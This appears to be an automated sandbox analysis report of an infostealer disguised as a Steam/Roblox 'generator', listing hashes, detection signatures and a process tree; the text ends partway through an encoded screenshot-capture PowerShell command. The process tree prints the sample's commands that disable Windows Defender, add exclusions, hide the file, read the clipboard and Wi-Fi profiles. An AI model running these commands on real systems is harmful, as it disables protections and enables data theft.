Analysis
-
max time kernel
102s -
max time network
150s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
28-11-2024 19:25
Behavioral task
behavioral1
Sample
gen steam.roblox/License-.rtf
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
gen steam.roblox/gen-(1).exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
����O��.pyc
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
gen steam.roblox/secret.txt
Resource
win10ltsc2021-20241023-en
General
-
Target
gen steam.roblox/gen-(1).exe
-
Size
7.4MB
-
MD5
ccf3d3e9e629990d4dcfa3fec7f3ec1e
-
SHA1
479f853bf161ddff64a044b486d70e96654c923e
-
SHA256
f332235072e8ab37ec7c472f04e1d919be8a841cdc7bc3c3a19f1deb0ad2d700
-
SHA512
83a0458a3ebbf70b26e2e3324c836cc2b82748b2a17e195334b4a31a43ee0c35a288eb2e375cf440564ad9ba78f9d908ff178290354207a004ee98899776863d
-
SSDEEP
98304:wGSi8TR8WnurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EwKhOh112mY:wBcgurErvI9pWjgfPvzm6gsFEF4fC
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 892 MpCmdRun.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3468 powershell.exe 3292 powershell.exe 2492 powershell.exe 3588 powershell.exe 4864 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exegen-(1).exeattrib.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts gen-(1).exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 2424 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
gen-(1).exepid Process 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe 4616 gen-(1).exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com 22 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid Process 2060 tasklist.exe 4396 tasklist.exe 1636 tasklist.exe 2456 tasklist.exe 3172 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule behavioral2/files/0x002800000004507b-21.dat upx behavioral2/memory/4616-25-0x00007FFAD6E00000-0x00007FFAD73F2000-memory.dmp upx behavioral2/files/0x002800000004506e-27.dat upx behavioral2/memory/4616-30-0x00007FFAE64A0000-0x00007FFAE64C4000-memory.dmp upx behavioral2/files/0x002800000004507e-38.dat upx behavioral2/files/0x0028000000045075-48.dat upx behavioral2/files/0x0028000000045074-47.dat upx behavioral2/files/0x0028000000045073-46.dat upx behavioral2/files/0x0028000000045072-45.dat upx behavioral2/files/0x0028000000045071-44.dat upx behavioral2/files/0x0028000000045070-43.dat upx behavioral2/files/0x002800000004506f-42.dat upx behavioral2/files/0x002800000004506d-41.dat upx behavioral2/files/0x0028000000045080-40.dat upx behavioral2/files/0x002800000004507f-39.dat upx behavioral2/files/0x002800000004507a-35.dat upx behavioral2/files/0x0028000000045078-34.dat upx behavioral2/memory/4616-32-0x00007FFAEFA00000-0x00007FFAEFA0F000-memory.dmp upx behavioral2/files/0x0028000000045079-31.dat upx behavioral2/memory/4616-54-0x00007FFAE5460000-0x00007FFAE548D000-memory.dmp upx behavioral2/memory/4616-56-0x00007FFAED290000-0x00007FFAED2A9000-memory.dmp upx behavioral2/memory/4616-58-0x00007FFAE5430000-0x00007FFAE5453000-memory.dmp upx behavioral2/memory/4616-60-0x00007FFAE18A0000-0x00007FFAE1A1E000-memory.dmp upx behavioral2/memory/4616-63-0x00007FFAE5410000-0x00007FFAE5429000-memory.dmp upx behavioral2/memory/4616-64-0x00007FFAE68A0000-0x00007FFAE68AD000-memory.dmp upx behavioral2/memory/4616-70-0x00007FFAE53D0000-0x00007FFAE5403000-memory.dmp upx behavioral2/memory/4616-71-0x00007FFAD6300000-0x00007FFAD6829000-memory.dmp upx behavioral2/memory/4616-73-0x00007FFAE17D0000-0x00007FFAE189D000-memory.dmp upx behavioral2/memory/4616-69-0x00007FFAD6E00000-0x00007FFAD73F2000-memory.dmp upx behavioral2/memory/4616-76-0x00007FFAE64A0000-0x00007FFAE64C4000-memory.dmp upx behavioral2/memory/4616-78-0x00007FFAE6430000-0x00007FFAE643D000-memory.dmp upx behavioral2/memory/4616-77-0x00007FFAE5160000-0x00007FFAE5174000-memory.dmp upx behavioral2/memory/4616-80-0x00007FFAE5460000-0x00007FFAE548D000-memory.dmp upx behavioral2/memory/4616-81-0x00007FFAD5F00000-0x00007FFAD601C000-memory.dmp upx behavioral2/memory/4616-121-0x00007FFAE5430000-0x00007FFAE5453000-memory.dmp upx behavioral2/memory/4616-245-0x00007FFAE18A0000-0x00007FFAE1A1E000-memory.dmp upx behavioral2/memory/4616-313-0x00007FFAE5410000-0x00007FFAE5429000-memory.dmp upx behavioral2/memory/4616-330-0x00007FFAD6300000-0x00007FFAD6829000-memory.dmp upx behavioral2/memory/4616-329-0x00007FFAE53D0000-0x00007FFAE5403000-memory.dmp upx behavioral2/memory/4616-336-0x00007FFAE17D0000-0x00007FFAE189D000-memory.dmp upx behavioral2/memory/4616-348-0x00007FFAD6E00000-0x00007FFAD73F2000-memory.dmp upx behavioral2/memory/4616-354-0x00007FFAE18A0000-0x00007FFAE1A1E000-memory.dmp upx behavioral2/memory/4616-349-0x00007FFAE64A0000-0x00007FFAE64C4000-memory.dmp upx behavioral2/memory/4616-384-0x00007FFAD6E00000-0x00007FFAD73F2000-memory.dmp upx behavioral2/memory/4616-399-0x00007FFAD6E00000-0x00007FFAD73F2000-memory.dmp upx behavioral2/memory/4616-423-0x00007FFAE53D0000-0x00007FFAE5403000-memory.dmp upx behavioral2/memory/4616-424-0x00007FFAD6300000-0x00007FFAD6829000-memory.dmp upx behavioral2/memory/4616-422-0x00007FFAE17D0000-0x00007FFAE189D000-memory.dmp upx behavioral2/memory/4616-421-0x00007FFAE5410000-0x00007FFAE5429000-memory.dmp upx behavioral2/memory/4616-420-0x00007FFAE18A0000-0x00007FFAE1A1E000-memory.dmp upx behavioral2/memory/4616-419-0x00007FFAE5430000-0x00007FFAE5453000-memory.dmp upx behavioral2/memory/4616-418-0x00007FFAED290000-0x00007FFAED2A9000-memory.dmp upx behavioral2/memory/4616-417-0x00007FFAE5460000-0x00007FFAE548D000-memory.dmp upx behavioral2/memory/4616-416-0x00007FFAEFA00000-0x00007FFAEFA0F000-memory.dmp upx behavioral2/memory/4616-415-0x00007FFAE64A0000-0x00007FFAE64C4000-memory.dmp upx behavioral2/memory/4616-414-0x00007FFAE68A0000-0x00007FFAE68AD000-memory.dmp upx behavioral2/memory/4616-413-0x00007FFAD5F00000-0x00007FFAD601C000-memory.dmp upx behavioral2/memory/4616-412-0x00007FFAE6430000-0x00007FFAE643D000-memory.dmp upx behavioral2/memory/4616-411-0x00007FFAE5160000-0x00007FFAE5174000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2876 cmd.exe 1076 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 1004 WMIC.exe 1100 WMIC.exe 660 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 53 IoCs
Processes:
WMIC.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exepid Process 1888 WMIC.exe 1888 WMIC.exe 1888 WMIC.exe 1888 WMIC.exe 3588 powershell.exe 3468 powershell.exe 3468 powershell.exe 3588 powershell.exe 1004 WMIC.exe 1004 WMIC.exe 1004 WMIC.exe 1004 WMIC.exe 1100 WMIC.exe 1100 WMIC.exe 1100 WMIC.exe 1100 WMIC.exe 4864 powershell.exe 4864 powershell.exe 3360 WMIC.exe 3360 WMIC.exe 3360 WMIC.exe 3360 WMIC.exe 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe 2504 powershell.exe 2504 powershell.exe 2504 powershell.exe 3292 powershell.exe 3292 powershell.exe 3292 powershell.exe 4740 powershell.exe 4740 powershell.exe 2000 WMIC.exe 2000 WMIC.exe 2000 WMIC.exe 2000 WMIC.exe 3220 WMIC.exe 3220 WMIC.exe 3220 WMIC.exe 3220 WMIC.exe 3084 WMIC.exe 3084 WMIC.exe 3084 WMIC.exe 3084 WMIC.exe 2492 powershell.exe 2492 powershell.exe 660 WMIC.exe 660 WMIC.exe 660 WMIC.exe 660 WMIC.exe 868 powershell.exe 868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exetasklist.exepowershell.exepowershell.exedescription pid Process Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeSecurityPrivilege 1888 WMIC.exe Token: SeTakeOwnershipPrivilege 1888 WMIC.exe Token: SeLoadDriverPrivilege 1888 WMIC.exe Token: SeSystemProfilePrivilege 1888 WMIC.exe Token: SeSystemtimePrivilege 1888 WMIC.exe Token: SeProfSingleProcessPrivilege 1888 WMIC.exe Token: SeIncBasePriorityPrivilege 1888 WMIC.exe Token: SeCreatePagefilePrivilege 1888 WMIC.exe Token: SeBackupPrivilege 1888 WMIC.exe Token: SeRestorePrivilege 1888 WMIC.exe Token: SeShutdownPrivilege 1888 WMIC.exe Token: SeDebugPrivilege 1888 WMIC.exe Token: SeSystemEnvironmentPrivilege 1888 WMIC.exe Token: SeRemoteShutdownPrivilege 1888 WMIC.exe Token: SeUndockPrivilege 1888 WMIC.exe Token: SeManageVolumePrivilege 1888 WMIC.exe Token: 33 1888 WMIC.exe Token: 34 1888 WMIC.exe Token: 35 1888 WMIC.exe Token: 36 1888 WMIC.exe Token: SeDebugPrivilege 4396 tasklist.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 3468 powershell.exe Token: SeIncreaseQuotaPrivilege 1888 WMIC.exe Token: SeSecurityPrivilege 1888 WMIC.exe Token: SeTakeOwnershipPrivilege 1888 WMIC.exe Token: SeLoadDriverPrivilege 1888 WMIC.exe Token: SeSystemProfilePrivilege 1888 WMIC.exe Token: SeSystemtimePrivilege 1888 WMIC.exe Token: SeProfSingleProcessPrivilege 1888 WMIC.exe Token: SeIncBasePriorityPrivilege 1888 WMIC.exe Token: SeCreatePagefilePrivilege 1888 WMIC.exe Token: SeBackupPrivilege 1888 WMIC.exe Token: SeRestorePrivilege 1888 WMIC.exe Token: SeShutdownPrivilege 1888 WMIC.exe Token: SeDebugPrivilege 1888 WMIC.exe Token: SeSystemEnvironmentPrivilege 1888 WMIC.exe Token: SeRemoteShutdownPrivilege 1888 WMIC.exe Token: SeUndockPrivilege 1888 WMIC.exe Token: SeManageVolumePrivilege 1888 WMIC.exe Token: 33 1888 WMIC.exe Token: 34 1888 WMIC.exe Token: 35 1888 WMIC.exe Token: 36 1888 WMIC.exe Token: SeIncreaseQuotaPrivilege 3588 powershell.exe Token: SeSecurityPrivilege 3588 powershell.exe Token: SeTakeOwnershipPrivilege 3588 powershell.exe Token: SeLoadDriverPrivilege 3588 powershell.exe Token: SeSystemProfilePrivilege 3588 powershell.exe Token: SeSystemtimePrivilege 3588 powershell.exe Token: SeProfSingleProcessPrivilege 3588 powershell.exe Token: SeIncBasePriorityPrivilege 3588 powershell.exe Token: SeCreatePagefilePrivilege 3588 powershell.exe Token: SeBackupPrivilege 3588 powershell.exe Token: SeRestorePrivilege 3588 powershell.exe Token: SeShutdownPrivilege 3588 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeSystemEnvironmentPrivilege 3588 powershell.exe Token: SeRemoteShutdownPrivilege 3588 powershell.exe Token: SeUndockPrivilege 3588 powershell.exe Token: SeManageVolumePrivilege 3588 powershell.exe Token: 33 3588 powershell.exe Token: 34 3588 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
gen-(1).exegen-(1).execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 3100 wrote to memory of 4616 3100 gen-(1).exe 81 PID 3100 wrote to memory of 4616 3100 gen-(1).exe 81 PID 4616 wrote to memory of 4828 4616 gen-(1).exe 82 PID 4616 wrote to memory of 4828 4616 gen-(1).exe 82 PID 4616 wrote to memory of 3368 4616 gen-(1).exe 83 PID 4616 wrote to memory of 3368 4616 gen-(1).exe 83 PID 4616 wrote to memory of 3372 4616 gen-(1).exe 84 PID 4616 wrote to memory of 3372 4616 gen-(1).exe 84 PID 4616 wrote to memory of 4384 4616 gen-(1).exe 87 PID 4616 wrote to memory of 4384 4616 gen-(1).exe 87 PID 4616 wrote to memory of 1528 4616 gen-(1).exe 90 PID 4616 wrote to memory of 1528 4616 gen-(1).exe 90 PID 3372 wrote to memory of 3332 3372 cmd.exe 92 PID 3372 wrote to memory of 3332 3372 cmd.exe 92 PID 1528 wrote to memory of 1888 1528 cmd.exe 94 PID 1528 wrote to memory of 1888 1528 cmd.exe 94 PID 4384 wrote to memory of 4396 4384 cmd.exe 93 PID 4384 wrote to memory of 4396 4384 cmd.exe 93 PID 4828 wrote to memory of 3588 4828 cmd.exe 95 PID 4828 wrote to memory of 3588 4828 cmd.exe 95 PID 3368 wrote to memory of 3468 3368 cmd.exe 96 PID 3368 wrote to memory of 3468 3368 cmd.exe 96 PID 4616 wrote to memory of 1608 4616 gen-(1).exe 99 PID 4616 wrote to memory of 1608 4616 gen-(1).exe 99 PID 1608 wrote to memory of 2976 1608 cmd.exe 101 PID 1608 wrote to memory of 2976 1608 cmd.exe 101 PID 4616 wrote to memory of 360 4616 gen-(1).exe 162 PID 4616 wrote to memory of 360 4616 gen-(1).exe 162 PID 360 wrote to memory of 4976 360 cmd.exe 104 PID 360 wrote to memory of 4976 360 cmd.exe 104 PID 4616 wrote to memory of 2096 4616 gen-(1).exe 105 PID 4616 wrote to memory of 2096 4616 gen-(1).exe 105 PID 2096 wrote to memory of 1004 2096 cmd.exe 107 PID 2096 wrote to memory of 1004 2096 cmd.exe 107 PID 4616 wrote to memory of 4588 4616 gen-(1).exe 108 PID 4616 wrote to memory of 4588 4616 gen-(1).exe 108 PID 4588 wrote to memory of 1100 4588 cmd.exe 110 PID 4588 wrote to memory of 1100 4588 cmd.exe 110 PID 3368 wrote to memory of 892 3368 cmd.exe 111 PID 3368 wrote to memory of 892 3368 cmd.exe 111 PID 4616 wrote to memory of 3184 4616 gen-(1).exe 112 PID 4616 wrote to memory of 3184 4616 gen-(1).exe 112 PID 4616 wrote to memory of 2148 4616 gen-(1).exe 113 PID 4616 wrote to memory of 2148 4616 gen-(1).exe 113 PID 2148 wrote to memory of 4864 2148 cmd.exe 118 PID 2148 wrote to memory of 4864 2148 cmd.exe 118 PID 3184 wrote to memory of 4180 3184 cmd.exe 119 PID 3184 wrote to memory of 4180 3184 cmd.exe 119 PID 4616 wrote to memory of 4340 4616 gen-(1).exe 120 PID 4616 wrote to memory of 4340 4616 gen-(1).exe 120 PID 4616 wrote to memory of 2760 4616 gen-(1).exe 121 PID 4616 wrote to memory of 2760 4616 gen-(1).exe 121 PID 4340 wrote to memory of 2456 4340 cmd.exe 124 PID 4340 wrote to memory of 2456 4340 cmd.exe 124 PID 2760 wrote to memory of 1636 2760 cmd.exe 125 PID 2760 wrote to memory of 1636 2760 cmd.exe 125 PID 4616 wrote to memory of 3292 4616 gen-(1).exe 178 PID 4616 wrote to memory of 3292 4616 gen-(1).exe 178 PID 4616 wrote to memory of 3356 4616 gen-(1).exe 127 PID 4616 wrote to memory of 3356 4616 gen-(1).exe 127 PID 4616 wrote to memory of 904 4616 gen-(1).exe 130 PID 4616 wrote to memory of 904 4616 gen-(1).exe 130 PID 4616 wrote to memory of 4232 4616 gen-(1).exe 132 PID 4616 wrote to memory of 4232 4616 gen-(1).exe 132 -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid Process 4180 attrib.exe 2820 attrib.exe 3080 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please dm the owner or join in the server.', 0, 'the generator license not working, or dont updated | sorry |', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please dm the owner or join in the server.', 0, 'the generator license not working, or dont updated | sorry |', 0+16);close()"4⤵PID:3332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\gen steam.roblox\gen-(1).exe"4⤵
- Views/modifies file attributes
PID:4180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3292
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:904
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4232
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3648 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:876
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2780
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBo